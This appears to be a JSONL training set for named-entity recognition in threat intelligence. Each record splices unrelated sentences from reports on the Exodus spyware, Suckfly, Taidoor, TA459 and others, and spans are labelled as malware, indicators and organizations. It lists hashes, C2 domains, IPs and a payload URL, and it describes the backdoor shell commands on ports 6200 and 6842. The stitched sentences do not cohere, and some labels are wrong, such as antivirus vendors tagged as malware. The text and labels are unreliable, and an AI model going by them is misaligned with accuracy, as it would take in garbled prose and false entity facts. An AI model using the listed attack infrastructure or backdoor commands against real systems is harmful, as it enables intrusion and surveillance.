{"text": "For example , the password of the WiFi network used by the phone was stored in the folder /storage/emulated/0/.lost+found/0BBDA068-9D27-4B55-B226-299FCF2B4242/ using the following file name format DD_MM_2019_HH_mm_ss_XXXXXXXXXXXXX.txt.crypt ( the datetime followed by the IMEI ) . While there have been several Suckfly campaigns that infected organizations with the group 's custom malware Backdoor.Nidiran , the Indian targets show a greater amount of post-infection activity than targets in other regions . Federation of Independent Palestinian Communities and Organizations and Events in the Diaspora . This is clear and shocking evidence of a deliberate and malicious attack by Russia against Ukraine which had significant consequences on ordinary people and businesses in Ukraine and across Europe .", "spans": [{"start": 90, "end": 159, "label": "Indicator"}, {"start": 197, "end": 240, "label": "Indicator"}, {"start": 390, "end": 406, "label": "Malware"}, {"start": 509, "end": 587, "label": "Organization"}, {"start": 662, "end": 678, "label": "Malware"}, {"start": 682, "end": 688, "label": "Organization"}, {"start": 697, "end": 704, "label": "Organization"}]}
{"text": "Eventually we observed the agent exfiltrate the WiFi password from our test phone to the Command & Control server : Similarly , the agent also sent to the Command & Control the list of installed apps : This Command & Control seems to have been active since at least April 2017 and was registered impersonating the legitimate service AccuWeather . The first known Suckfly campaign began in April of 2014 . The letter commemorates the 73rd anniversary of the Syrian Army , and expresses the Palestinian support of Bashar Al-Asad . Attackers may perform seemingly authorized actions but left unchecked , victims may be met with an unwelcome surprise .", "spans": [{"start": 333, "end": 344, "label": "System"}, {"start": 457, "end": 468, "label": "Organization"}, {"start": 529, "end": 538, "label": "Organization"}, {"start": 601, "end": 608, "label": "Organization"}]}
{"text": "Local and Remote Shells In order to execute commands on the infected devices , as well as to provide a reverse shell to the Command & Control operators , Exodus Two immediately attempts to execute a payload it downloads with the name null . Suckfly 's attacks on government organizations that provide information technology services to other government branches is not limited to India . The letter ends with \u201c Death to Israel \u201d and \u201c Humiliation and shame to the tyrant America \u201d 65c8b9e9017ac84d90553a252c836c38b6a3902e5ab24d3a4b8a584e2d615fcc . This is just another example of how these groups can now quickly develop their own ransomware variants by standing on the shoulders of those criminals who had their previous work exposed publicly .", "spans": [{"start": 154, "end": 164, "label": "Malware"}, {"start": 263, "end": 287, "label": "Organization"}, {"start": 301, "end": 332, "label": "Organization"}, {"start": 342, "end": 352, "label": "Organization"}, {"start": 481, "end": 545, "label": "Indicator"}, {"start": 713, "end": 743, "label": "Vulnerability"}]}
{"text": "Once launched , null will first verify whether it is able to fork on the system and that there is no other instance of itself currently running by checking whether the local port number 6842 is available . It has conducted attacks on similar organizations in Saudi Arabia , likely because of the access that those organizations have . Daily_Report.docx : The Winnti group diversified its targets to include enterprises such as those in pharmaceutics and telecommunications .", "spans": [{"start": 174, "end": 190, "label": "Indicator"}, {"start": 335, "end": 352, "label": "Indicator"}, {"start": 359, "end": 371, "label": "Organization"}, {"start": 407, "end": 418, "label": "Organization"}, {"start": 436, "end": 449, "label": "Organization"}, {"start": 454, "end": 472, "label": "Organization"}]}
{"text": "This payload will then attempt to instantiate a remote reverse /system/bin/sh shell to the Command & Control ws.my-local-weather [ . Similar to its other attacks , Suckfly used the Nidiran back door along with a number of hacktools to infect the victim 's internal hosts . Daily summary of news concerning different Palestinian govenment related issues d3771d58051cb0f4435232769ed11c0c0e6457505962ddb6eeb46d900de55428 . Attackers could exploit these vulnerabilities to carry out a variety of attacks , in some cases gaining the ability to execute remote code on the targeted machine .", "spans": [{"start": 63, "end": 77, "label": "Indicator"}, {"start": 109, "end": 132, "label": "Indicator"}, {"start": 181, "end": 198, "label": "System"}, {"start": 222, "end": 231, "label": "System"}, {"start": 316, "end": 337, "label": "Organization"}, {"start": 353, "end": 417, "label": "Indicator"}, {"start": 420, "end": 429, "label": "Organization"}]}
{"text": "] com on port 22011 . In 2015 , Suckfly conducted a multistage attack . Directory of Government Services.pdf : Tracked by Mandiant as FREEFIRE , it is a lightweight backdoor written for .NET .", "spans": [{"start": 9, "end": 19, "label": "Indicator"}, {"start": 72, "end": 108, "label": "Indicator"}, {"start": 134, "end": 142, "label": "Malware"}, {"start": 145, "end": 192, "label": "Malware"}]}
{"text": "It is worth noticing that this remote reverse shell does not employ any transport cryptography . Suckfly conducted a multistage attack between April 22 and May 4 . A screenshot from a website of the Palestinian government , showing a directory of the different ministries 9e4464d8dc8a3984561a104a93a7b8d6eb3d622d5187ae1d3fa6f6dafa2231a8 . These requests are aimed at spreading the attack laterally within the network and can be investigated using Endpoint Detection and Response EDR solutions .", "spans": [{"start": 199, "end": 221, "label": "Organization"}, {"start": 272, "end": 336, "label": "Indicator"}]}
{"text": "The traffic transits in clear and is therefore potentially exposed to man-in-the-middle attacks : At the same time , null will also bind a local shell on 0.0.0.0:6842 . On April 22 , 2015 , Suckfly exploited a vulnerability on the targeted employee 's operating system ( Windows ) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack . Meeting Agenda.pdf : That 's because a new ransomware called BlackSuit had appeared which shared 98 percent of its code with the infamous Royal ransomware .", "spans": [{"start": 154, "end": 166, "label": "Indicator"}, {"start": 359, "end": 376, "label": "System"}, {"start": 414, "end": 432, "label": "Indicator"}, {"start": 475, "end": 484, "label": "Malware"}, {"start": 552, "end": 568, "label": "Malware"}]}
{"text": "This local port is used by Exodus Two to execute various commands on the Android device , such as enabling or disabling certain services , or parsing app databases . Suckfly conducted a multistage attack against an e-commerce organization . Corrupted file f6876fd68fdb9c964a573ad04e4e0d3cfd328304659156efc9866844a28c7427 . imgonline-com-ua-dexifEEdWuIbNSv7G.jpg : The FBI released an advisory warning users about NFT phishing scams where developers are often approached via social media and tricked into visiting a malicious link .", "spans": [{"start": 27, "end": 37, "label": "Malware"}, {"start": 73, "end": 80, "label": "System"}, {"start": 215, "end": 238, "label": "Organization"}, {"start": 256, "end": 320, "label": "Indicator"}, {"start": 323, "end": 361, "label": "Indicator"}, {"start": 368, "end": 371, "label": "Organization"}]}
{"text": "However , binding a shell on all available interfaces will obviously make it accessible to anyone who is sharing at least a local network with an infected device . Suckfly conducted a multistage attack against an e-commerce organization based in India . potentially leaked Hamas document detailing Hamas 32nd anniversary expenses in different regions in the Palestinian Territories 932ecbc5112abd0ed30231896752ca471ecd0c600b85134631c1d5ffcf5469fb . \u2022 Other actors merged into this group : 6 UNC1878 is a financially motivated group that monetizes their intrusions by extorting their victims following the deployment of RYUK ransomware .", "spans": [{"start": 213, "end": 236, "label": "Organization"}, {"start": 382, "end": 446, "label": "Indicator"}, {"start": 491, "end": 498, "label": "Organization"}, {"start": 567, "end": 615, "label": "Organization"}, {"start": 619, "end": 634, "label": "System"}]}
{"text": "For example , if an infected device is connected to a public Wi-Fi network any other host will be able to obtain a terminal on the device without any form of authentication or verification by simply connecting to the port . Most of the group 's attacks are focused on government or technology related companies and organizations . Asala.mp3 : The vulnerabilities Talos disclosed to the operators of Open Babel can all be triggered by tricking a user into opening a specially crafted , malformed file .", "spans": [{"start": 268, "end": 278, "label": "Organization"}, {"start": 282, "end": 310, "label": "Organization"}, {"start": 331, "end": 340, "label": "Indicator"}, {"start": 363, "end": 368, "label": "Organization"}, {"start": 399, "end": 409, "label": "System"}]}
{"text": "If the mobile operator does n't enforce proper client isolation , it is possible that the infected devices are also exposed to the rest of the cellular network . While we know the attackers used a custom dropper to install the back door , we do not know the delivery vector . An .mp3 file of a song by the famous Syrian singer Asala Nasri ( song name : Fen Habibi , translation : \u201c where is my loved one? \u201d ) 4583b49086c7b88cf9d074597b1d65ff33730e1337aee2a87b8745e94539d964 . Since the beginning of 2023 , the majority of observed KillNet targeting has focused on the U.S. , Europe , and international institutions such as NATO .", "spans": [{"start": 197, "end": 211, "label": "System"}, {"start": 279, "end": 283, "label": "Indicator"}, {"start": 409, "end": 473, "label": "Indicator"}, {"start": 531, "end": 538, "label": "Organization"}]}
{"text": "Obviously , this inevitably leaves the device open not only to further compromise but to data tampering as well . While tracking what days of the week Suckfly used its hacktools , we discovered that the group was only active Monday through Friday . In addition to the documents , the content includes a number of political cartoons that criticize Hamas \u2019 relations with Iran and Hamas \u2019 standing as a resistance movement . Facebook stated that the attackers also pretended to work in hospitality , medicine , journalism , NGOs , or airlines , sometimes conversing with their targets for months with profiles across various social media platforms .", "spans": [{"start": 168, "end": 177, "label": "System"}, {"start": 423, "end": 431, "label": "Organization"}]}
{"text": "null is not the only payload opening a shell on the phone . By targeting all of these organizations together , Suckfly could have had a much larger impact on India and its economy . While the majority of infections in this campaign did not originate from Malicious Microsoft Word document , the Cybereason Nocturnus team found several weaponized Microsoft Word document with an embedded downloader macro E-TOOL that downloads and installs the backdoor used in this attack . The intent of cybercriminals may be evaluated during the research stage of the cyberattack kill chain where they investigate potential entry points , and collect data about the company , users and technology systems in place .", "spans": [{"start": 255, "end": 288, "label": "System"}, {"start": 295, "end": 315, "label": "Organization"}, {"start": 335, "end": 369, "label": "System"}, {"start": 387, "end": 397, "label": "System"}, {"start": 398, "end": 410, "label": "System"}, {"start": 443, "end": 451, "label": "Malware"}]}
{"text": "The rootdaemon binary in fact offers several other possibilities to execute commands on the infected device just by connecting to TCP port 6200 and issuing one of the following commands . While we don't know the motivations behind the attacks , the targeted commercial organizations , along with the targeted government organizations , may point in this direction . CV Manal 1 : Cl0p 's precipitous rise to the top of the charts this month , on the other hand , can be explained by their exploitation of a zero - day in MOVEit Transfer , a widely used file transfer software .", "spans": [{"start": 134, "end": 143, "label": "Indicator"}, {"start": 258, "end": 282, "label": "Organization"}, {"start": 309, "end": 333, "label": "Organization"}, {"start": 366, "end": 376, "label": "Indicator"}, {"start": 379, "end": 383, "label": "Organization"}, {"start": 506, "end": 516, "label": "Vulnerability"}, {"start": 520, "end": 535, "label": "System"}]}
{"text": "Sending the command sh to TCP port 6200 results in a full terminal being dropped : Sending the command cmd followed by a proper terminal command will execute it and print the output ( in the example we use id which displays the identity of the system user running the issued commands ) : Doing the same as above but with command sucmd will run the terminal command as root : Other commands supported by rootdaemon on TCP port 6200 are su ( which in our tests did n't properly work ) , loadsocketpolicy , loadfilepolicy , remount and removeroot There is no evidence that Suckfly gained any benefits from attacking the government organizations , but someone else may have benefited from these attacks . Resume of a woman from Abu-Dis , Palestinian Authority 4a6d1b686873158a1eb088a2756daf2882bef4f5ffc7af370859b6f87c08840f . The targeting of a telecommunications company and government also point to the motivation behind the campaign being intelligence gathering , which is the motivation that generally drives Budworm activity .", "spans": [{"start": 30, "end": 39, "label": "Indicator"}, {"start": 421, "end": 430, "label": "Indicator"}, {"start": 617, "end": 641, "label": "Organization"}, {"start": 734, "end": 755, "label": "Organization"}, {"start": 756, "end": 820, "label": "Indicator"}, {"start": 842, "end": 868, "label": "Organization"}, {"start": 873, "end": 883, "label": "Organization"}, {"start": 924, "end": 932, "label": "Organization"}, {"start": 1010, "end": 1017, "label": "Organization"}]}
{"text": ". During this time they were able to steal digital certificates from South Korean companies and launch attacks against Indian and Saudi Arabian government organizations . Employee-entitlements-2020.doc : What makes COSMICENERGY unique is that based on our analysis , a contractor may have developed it as a red teaming tool for simulated power disruption exercises hosted by Rostelecom - Solar , a Russian cyber security company .", "spans": [{"start": 82, "end": 91, "label": "Organization"}, {"start": 144, "end": 168, "label": "Organization"}, {"start": 171, "end": 201, "label": "Indicator"}, {"start": 215, "end": 227, "label": "Malware"}, {"start": 267, "end": 364, "label": "Malware"}, {"start": 375, "end": 393, "label": "Organization"}, {"start": 398, "end": 428, "label": "Organization"}]}
{"text": "At the cost of possibly being overly verbose , following is the output of an nmap scan of the infected Android device from a laptop in the same local network , which further demonstrantes the availability of the same open TCP ports that we have mentioned thus far : Identification of eSurv Presence of Italian language At a first look , the first samples of the spyware we obtained did not show immediately evident connections to any company . We believe that Suckfly will continue to target organizations in India and similar organizations in other countries in order to provide economic insight to the organization behind Suckfly 's operations . A statement of the Ministry of Finance on civil and military employee benefits and salaries , discussing the conterversial issue Palestinian Authority employees that have not been paid or paid in full their salaries b33f22b967a5be0e886d479d47d6c9d35c6639d2ba2e14ffe42e7d2e5b11ad80 . The first suspicious activity from the threat actor involved the use of the gpresult command to dump the policy settings enforced on the computer for a specified user .", "spans": [{"start": 284, "end": 289, "label": "Organization"}, {"start": 580, "end": 588, "label": "Organization"}, {"start": 667, "end": 686, "label": "Organization"}, {"start": 777, "end": 798, "label": "Organization"}, {"start": 864, "end": 928, "label": "Indicator"}, {"start": 970, "end": 982, "label": "Organization"}]}
{"text": "However , the persistent presence of Italian language both on the Google Play Store pages as well as inside the spyware code was a clear sign that an Italian actor was behind the creation of this platform . This time , however , TA459 opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . When the victims open the document , they are encouraged to click on Enable Content , which causes the embedded malicious macro E-TOOL code to run . It is accessed using a path confusion exploit , CVE-2022 - 41040 , allowing the attacker to reach the backend for arbitrary URLs .", "spans": [{"start": 66, "end": 77, "label": "System"}, {"start": 287, "end": 312, "label": "Malware"}, {"start": 345, "end": 358, "label": "Vulnerability"}, {"start": 373, "end": 385, "label": "System"}, {"start": 417, "end": 443, "label": "System"}, {"start": 446, "end": 449, "label": "System"}, {"start": 566, "end": 575, "label": "System"}, {"start": 576, "end": 588, "label": "System"}]}
{"text": "Initially some particular words from the decompiled classes.dex of Exodus Two sent us in the right direction . Proofpoint is tracking this attacker , believed to operate out of China , as TA459 . The macro code embedded in the document is rather simple and is not obfuscated . Many of the individuals work at organizations related to financial services , cryptocurrency , blockchain , web3 and related entities .", "spans": [{"start": 52, "end": 63, "label": "Indicator"}, {"start": 67, "end": 73, "label": "Malware"}, {"start": 111, "end": 121, "label": "Organization"}, {"start": 188, "end": 193, "label": "Organization"}]}
{"text": "\" Mundizza '' is a dialectal word , a derivative of the proper Italian word \" immondizia '' that translates to \" trash '' or \" garbage '' in English . This time , however , attackers opportunistically used spear-phishing emails with a Microsoft Word attachment exploiting the recently patched CVE-2017-0199 to deploy the ZeroT Trojan , which in turn downloaded the PlugX Remote Access Trojan ( RAT ) . In fact , it is almost unusual in its unsophistication . Regardless of the cause , these leaks are having a significant effect on the threat landscape , making it easier for novice or unskilled actors to develop their own ransomware variants without much effort or knowledge .", "spans": [{"start": 235, "end": 260, "label": "Malware"}, {"start": 293, "end": 306, "label": "Vulnerability"}, {"start": 321, "end": 333, "label": "System"}, {"start": 365, "end": 391, "label": "System"}, {"start": 394, "end": 397, "label": "System"}]}
{"text": "Interestingly , \" mundizza '' is typical of Calabria , a region in the south of Italy , and more specifically it appears to be language native of the city of Catanzaro . TA549 possesses a diverse malware arsenal including PlugX , NetTraveler , and ZeroT . The macro code does the following : COSMICENERGY Possibly Associated With Russian Government - Funded Power Disruption and Emergency Response Exercises During our analysis of COSMICENERGY , we identified a comment in the code that indicated the sample uses a module associated with a project named \u201c Solar Polygon \u201d ( Figure 2 ) .", "spans": [{"start": 170, "end": 175, "label": "Organization"}, {"start": 222, "end": 227, "label": "System"}, {"start": 230, "end": 241, "label": "System"}, {"start": 248, "end": 253, "label": "System"}, {"start": 292, "end": 304, "label": "Malware"}, {"start": 330, "end": 348, "label": "Organization"}, {"start": 431, "end": 443, "label": "Malware"}, {"start": 460, "end": 571, "label": "Indicator"}]}
{"text": "Additionally , some copies of Exodus One use the following XOR key : Rino Gattuso is a famous retired Italian footballer , originally from Calabria . TA459 is well-known for targeting organizations in Russia and neighboring countries . Downloads a Base64 encoded payload from the following URL : Apropos of my retrospective report , Bullock found that a great many messages in Biderman \u2019s inbox were belligerent and anti - Semitic screeds from a former Ashley Madison employee named William Brewster Harrison .", "spans": [{"start": 150, "end": 155, "label": "Organization"}, {"start": 333, "end": 340, "label": "Organization"}, {"start": 453, "end": 476, "label": "Organization"}, {"start": 483, "end": 508, "label": "Organization"}]}
{"text": "While not too seriously , these elements made us restrict our research into surveillance companies from the region . Ongoing activity from attack groups like TA459 who consistently target individuals specializing in particular areas of research and expertise further complicate an already difficult security situation for organizations dealing with more traditional malware threats , phishing campaigns , and socially engineered threats every day . http://linda-callaghan.icu/Minkowski/brown . Check the memory size with to check if it is less than 2 GB .", "spans": [{"start": 158, "end": 163, "label": "Organization"}, {"start": 449, "end": 491, "label": "Indicator"}, {"start": 500, "end": 553, "label": "Indicator"}]}
{"text": "Overlapping Infrastructure with eSurv Surveillance Cameras The Command & Control domain configured in several of the malicious applications found on Google Play Store , ws.my-local-weather [ . Using data collected from the Trend Micro\u2122 Smart Protection Network , we are able to identify victims whose networks communicated with Taidoor C&C servers . Writes the decoded payload to C:\\ProgramData\\IntegratedOffice.txt . Another wave of suspected Dukes attacks was identified in November 2018 by FireEye , this time again relying on Windows LNK files and deploying Cobalt Strike .", "spans": [{"start": 149, "end": 166, "label": "System"}, {"start": 169, "end": 192, "label": "Indicator"}, {"start": 223, "end": 260, "label": "Organization"}, {"start": 328, "end": 347, "label": "System"}, {"start": 444, "end": 457, "label": "Organization"}, {"start": 493, "end": 500, "label": "Organization"}, {"start": 530, "end": 547, "label": "Indicator"}, {"start": 562, "end": 575, "label": "System"}]}
{"text": "] com , points to the IP address 54.69.156.31 which serves a self-signed TLS certificate with the certificate common name MyCert and fingerprint 11:41:45:2F : A7:07:23:54 : AE:9A : CE : F4 : FE:56 : AE : AC : B1 : C2:15:9F:6A : FC:1E : CC:7D : F8:61 : E3:25:26:73:6A . The Taidoor attackers have been actively engaging in targeted attacks since at least March 4 , 2009 . Decodes the Base64 payload and writes the file to C:\\ProgramData\\IntegratedOffice.exe . First , the discovery of new OT malware presents an immediate threat to affected organizations , since these discoveries are rare and because the malware principally takes advantage of insecure by design features of OT environments that are unlikely to be remedied any time soon .", "spans": [{"start": 33, "end": 45, "label": "Indicator"}, {"start": 145, "end": 170, "label": "Indicator"}, {"start": 173, "end": 206, "label": "Indicator"}, {"start": 209, "end": 241, "label": "Indicator"}, {"start": 242, "end": 266, "label": "Indicator"}, {"start": 421, "end": 456, "label": "Indicator"}, {"start": 488, "end": 498, "label": "Malware"}]}
{"text": "A search for this certificate fingerprint on the Internet scanning service Censys returns 8 additional servers : IP address 34.208.71.9 34.212.92.0 34.216.43.114 52.34.144.229 54.69.156.31 54.71.249.137 54.189.5.198 78.5.0.195 207.180.245.74 Opening the Command & Control web page in a browser presents a Basic Authentication prompt : Closing this prompt causes the server to send a \" 401 Unauthorized Response '' with an \" Access Denied '' message in Italian Taidoor spoofed Taiwanese government email addresses to send out socially engineered emails in the Chinese language that typically leveraged Taiwan-themed issues . Runs the executable file and deletes the .txt file . \u201c Who or what is asdfdfsda@asdf.com ? , \u201d Biderman asked , after being sent a list of nine email addresses .", "spans": [{"start": 124, "end": 135, "label": "Indicator"}, {"start": 136, "end": 147, "label": "Indicator"}, {"start": 148, "end": 161, "label": "Indicator"}, {"start": 162, "end": 175, "label": "Indicator"}, {"start": 176, "end": 188, "label": "Indicator"}, {"start": 189, "end": 202, "label": "Indicator"}, {"start": 203, "end": 215, "label": "Indicator"}, {"start": 216, "end": 226, "label": "Indicator"}, {"start": 227, "end": 241, "label": "Indicator"}, {"start": 486, "end": 496, "label": "Organization"}, {"start": 665, "end": 669, "label": "Indicator"}, {"start": 694, "end": 712, "label": "Organization"}, {"start": 719, "end": 727, "label": "Organization"}]}
{"text": ". Despite some exceptions , the Taidoor campaign often used Taiwanese IP addresses as C&C servers and email addresses to send out socially engineered emails with malware as attachments . Pierogi , the backdoor in this attack , appears to be a new backdoor written in Delphi . The new exploit method bypasses URL rewrite mitigations for the endpoint provided by Microsoft in response to \u2022", "spans": [{"start": 70, "end": 72, "label": "System"}, {"start": 187, "end": 194, "label": "Malware"}, {"start": 201, "end": 209, "label": "Malware"}, {"start": 247, "end": 255, "label": "System"}, {"start": 267, "end": 273, "label": "System"}, {"start": 361, "end": 370, "label": "Organization"}]}
{"text": "All of the other IP address we discovered sharing the same TLS certificate behave in the same way . One of the primary targets of the Taidoor campaign appeared to be the Taiwanese government . It enables the attackers to spy on victims using rather basic backdoor capabilities . Kaspersky \u2019s Global Research and Analysis Team ( GReAT ) has observed signs of its attacks in several countries including Germany , South Korea and Uzbekistan , as well as the US .", "spans": [{"start": 180, "end": 190, "label": "Organization"}, {"start": 255, "end": 263, "label": "Malware"}, {"start": 279, "end": 335, "label": "Organization"}]}
{"text": "The Command & Control server also displays a favicon image which looks like a small orange ball . Suckfly targeted one of India 's largest e-commerce companies , a major Indian shipping company , one of India 's largest financial organizations , and an IT firm that provides support for India 's largest stock exchange . While it is unknown at this point whether the backdoor was coded by the same members of the group behind the attacks , there are indications that suggest that the malware was authored by Ukranian-speaking malware developers . The network sees a high number of data access and transfer requests by the same user , who may be authorized , but does not regularly work with the targeted data assets and network resources .", "spans": [{"start": 139, "end": 159, "label": "Organization"}, {"start": 177, "end": 193, "label": "Organization"}, {"start": 220, "end": 243, "label": "Organization"}, {"start": 253, "end": 260, "label": "Organization"}, {"start": 367, "end": 375, "label": "Malware"}, {"start": 547, "end": 737, "label": "Indicator"}]}
{"text": "At the time of writing , a reverse image search for the favicon on Shodan using the query http.favicon.hash:990643579 returned around 40 web servers which use the same favicon . Data from the early part of this year shows that the Taidoor attackers rampantly used malicious.DOC files to exploit a Microsoft Common Controls vulnerability , CVE-2012-0158 . The commands used to communicate with the C2 servers and other strings in the binary are written in Ukrainian . Analyzing the code and data from the C2 , Ryan Sherstobitoff and Asheer Malhotra from McAfee , along with the company 's Advanced Threat Research Team ( ATR ) , discovered new variants of the Rising Sun backdoor that were used since at least 2016 .", "spans": [{"start": 90, "end": 117, "label": "Indicator"}, {"start": 264, "end": 277, "label": "Malware"}, {"start": 297, "end": 336, "label": "Vulnerability"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 397, "end": 399, "label": "System"}, {"start": 504, "end": 506, "label": "System"}, {"start": 509, "end": 527, "label": "Organization"}, {"start": 532, "end": 547, "label": "Organization"}, {"start": 553, "end": 559, "label": "Organization"}, {"start": 588, "end": 625, "label": "Organization"}, {"start": 659, "end": 678, "label": "System"}]}
{"text": "Many of these servers are control panels for video surveillance systems developed by the Italian company eSurv , based in Catanzaro , in Calabria , Italy . Taidoor actively sent out malicious documents and maintained several IP addresses for command and control . This is why we chose to name the malware Pierogi , after the popular East European dish . Talos discovered multiple vulnerabilities in Foxit PDF Reader that could allow an adversary to execute , arbitrary code on the targeted machine .", "spans": [{"start": 305, "end": 312, "label": "Malware"}, {"start": 354, "end": 359, "label": "Organization"}, {"start": 399, "end": 415, "label": "System"}]}
{"text": "Their publicly advertised products include CCTV management systems , surveillance drones , face and license plate recognition systems . The attackers actively sent out malicious documents and maintained several IP addresses for command and control . The backdoor has the following capabilities : Organizations can have hundreds , thousands or more of unremediated vulnerabilities that could open the door for an attacker .", "spans": [{"start": 351, "end": 379, "label": "Vulnerability"}, {"start": 412, "end": 420, "label": "Organization"}]}
{"text": "eSurv 's logo is identical to the Command & Control server favicon . As part of their social engineering ploy , the Taidoor attackers attach a decoy document to their emails that , when opened , displays the contents of a legitimate document but executes a malicious payload in the background . Collects information about the infected machine . Cisco Secure Firewall ( formerly Next - Generation Firewall and Firepower NGFW ) appliances such as Threat Defense Virtual , Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 86, "end": 104, "label": "Organization"}, {"start": 345, "end": 366, "label": "System"}, {"start": 378, "end": 423, "label": "System"}, {"start": 445, "end": 467, "label": "System"}, {"start": 470, "end": 497, "label": "System"}, {"start": 502, "end": 511, "label": "System"}]}
{"text": "Older samples connecting to eSurv Finally , Google shared with us some older samples of Exodus One ( with hashes 2055584625d24687bd027a63bc0b8faa7d1a854a535de74afba24840a52b1d2f and a37f5d2418c5f2f64d06ba28fe62edee1293a56158ddfa9f04020e316054363f ) which are not obfuscated and use the following disguise : The configuration of these older samples Sometimes , however , certain samples made use of domain names for HTTP communication . Uploads files to the attackers \u2019 server . cmd /c \" D:\\pack", "spans": [{"start": 28, "end": 33, "label": "Organization"}, {"start": 44, "end": 50, "label": "Organization"}, {"start": 88, "end": 98, "label": "Malware"}, {"start": 113, "end": 177, "label": "Indicator"}, {"start": 182, "end": 246, "label": "Indicator"}, {"start": 478, "end": 494, "label": "Indicator"}]}
{"text": "is very similar to newer ones , but it provides additional insights being not obfuscated : Firstly we can notice that , instead of generic domain names or IP addresses , these samples communicated with a Command & Control server located at attiva.exodus.esurv [ . Based on the command capabilities of the Taidoor malware , we were able to determine that data theft and data destruction was possible . Downloads additional payloads . Limited forensic evidence existed to determine exactly how STRATOFEAR was deployed to systems in the victim environment ; however , in each instance , STRATOFEAR was preceded by the deployment of FULLHOUSE.DOORED .", "spans": [{"start": 240, "end": 263, "label": "Indicator"}, {"start": 305, "end": 320, "label": "System"}, {"start": 354, "end": 364, "label": "Malware"}, {"start": 369, "end": 385, "label": "Malware"}, {"start": 492, "end": 502, "label": "Malware"}, {"start": 584, "end": 594, "label": "Malware"}, {"start": 629, "end": 645, "label": "Malware"}]}
{"text": "] it ( \" attiva '' is the Italian for \" activate '' ) . The ultimate objective of targeted attacks is to acquire sensitive data . Takes screenshots from the infected machine . RDP is designed to allow legitimate users to remotely connect to and control a system , such as when IT support needs to remotely control an employees computer to troubleshoot an issue or conduct regular maintenance .", "spans": [{"start": 176, "end": 179, "label": "System"}]}
{"text": "( We named the spyware \" Exodus '' after this Command & Control domain name . In December 2017 , FireEye publicly released our first analysis on the TRITON attack where malicious actors used the TRITON custom attack framework to manipulate industrial safety systems at a critical infrastructure facility and inadvertently caused a process shutdown . Executes arbitrary commands via the CMD shell . Rather than limiting security to searching for a series of stringent profiles , security teams can attempt to analyze threat indicators in real time .", "spans": [{"start": 97, "end": 104, "label": "Organization"}, {"start": 195, "end": 201, "label": "System"}, {"start": 386, "end": 395, "label": "System"}, {"start": 419, "end": 427, "label": "Organization"}, {"start": 478, "end": 492, "label": "Organization"}, {"start": 516, "end": 533, "label": "Indicator"}]}
{"text": ") Following is the snippet of code in these older Exodus One samples showing the connection to the Command & Control : Below is the almost identical composition of the request to the Command & Control server in mike.jar ( also containing the path 7e661733-e332-429a-a7e2-23649f27690f ) : To further corroborate the connection of the Exodus spyware with eSurv , the domain attiva.exodus.esurv.it resolves to the IP 212.47.242.236 which , according to In our most recent analysis , we attributed the intrusion activity that led to the deployment of TRITON to a Russian government-owned technical research institute in Moscow . In addition to spy features , the backdoor also implements a few checks to ensure it is running in a safe environment . The new documentary , The Ashley Madison Affair , begins airing today on Hulu in the United States and on Disney+ in the United Kingdom .", "spans": [{"start": 50, "end": 60, "label": "Malware"}, {"start": 211, "end": 219, "label": "Indicator"}, {"start": 333, "end": 347, "label": "Malware"}, {"start": 365, "end": 394, "label": "Indicator"}, {"start": 414, "end": 428, "label": "Indicator"}, {"start": 547, "end": 553, "label": "System"}, {"start": 659, "end": 667, "label": "Malware"}, {"start": 767, "end": 792, "label": "Organization"}, {"start": 818, "end": 822, "label": "Organization"}, {"start": 851, "end": 858, "label": "Organization"}]}
{"text": "public passive DNS data , in 2017 was used to host the domain server1cs.exodus.connexxa.it . For more in-depth analysis of TRITON and other cyber threats , consider subscribing to FireEye Cyber Threat Intelligence . Specifically , it looks for antivirus and other security products . Attribution to the Dukes was made partly on the LNK file structure and other TTPs , including the targets of the attack .", "spans": [{"start": 55, "end": 90, "label": "Indicator"}, {"start": 123, "end": 129, "label": "System"}, {"start": 180, "end": 213, "label": "Organization"}, {"start": 303, "end": 308, "label": "Organization"}, {"start": 332, "end": 350, "label": "Indicator"}, {"start": 355, "end": 365, "label": "Indicator"}, {"start": 382, "end": 403, "label": "Indicator"}]}
{"text": "Connexxa was a company also from Catanzaro . During this time , the attacker must ensure continued access to the target environment or risk losing years of effort and potentially expensive custom ICS malware . The backdoor queries Windows for installed antivirus software using WMI : SELECT * FROM AntiVirusProduct It looks for specific antivirus and security products installed on the infected machine , such as Kaspersky , eScan , F-secure and Bitdefender . Who is The Chaos Creator , and what else transpired between Harrison and Ashley Madison prior to his death ?", "spans": [{"start": 196, "end": 207, "label": "System"}, {"start": 214, "end": 222, "label": "Malware"}, {"start": 231, "end": 238, "label": "System"}, {"start": 278, "end": 281, "label": "System"}, {"start": 413, "end": 422, "label": "Malware"}, {"start": 425, "end": 430, "label": "Malware"}, {"start": 433, "end": 441, "label": "Malware"}, {"start": 446, "end": 457, "label": "Malware"}, {"start": 467, "end": 484, "label": "Organization"}, {"start": 520, "end": 528, "label": "Organization"}, {"start": 533, "end": 547, "label": "Organization"}]}
{"text": "According to publicly available information , the founder of Connexxa seems to also be the CEO of eSurv . In this report we continue our research of the actor 's operations with a specific focus on a selection of custom information technology ( IT ) tools and tactics the threat actor leveraged during the early stages of the targeted attack lifecycle . The backdoor achieves persistence using a classic startup item autorun technique : Mandiant has also observed the deployment of various remote monitoring and management ( RMM ) tools following the successful exploitation of CVE-2023 - 4966 .", "spans": [{"start": 61, "end": 69, "label": "Organization"}, {"start": 98, "end": 103, "label": "Organization"}, {"start": 220, "end": 242, "label": "Organization"}, {"start": 245, "end": 247, "label": "Organization"}, {"start": 358, "end": 366, "label": "Malware"}, {"start": 490, "end": 536, "label": "System"}, {"start": 578, "end": 593, "label": "Vulnerability"}]}
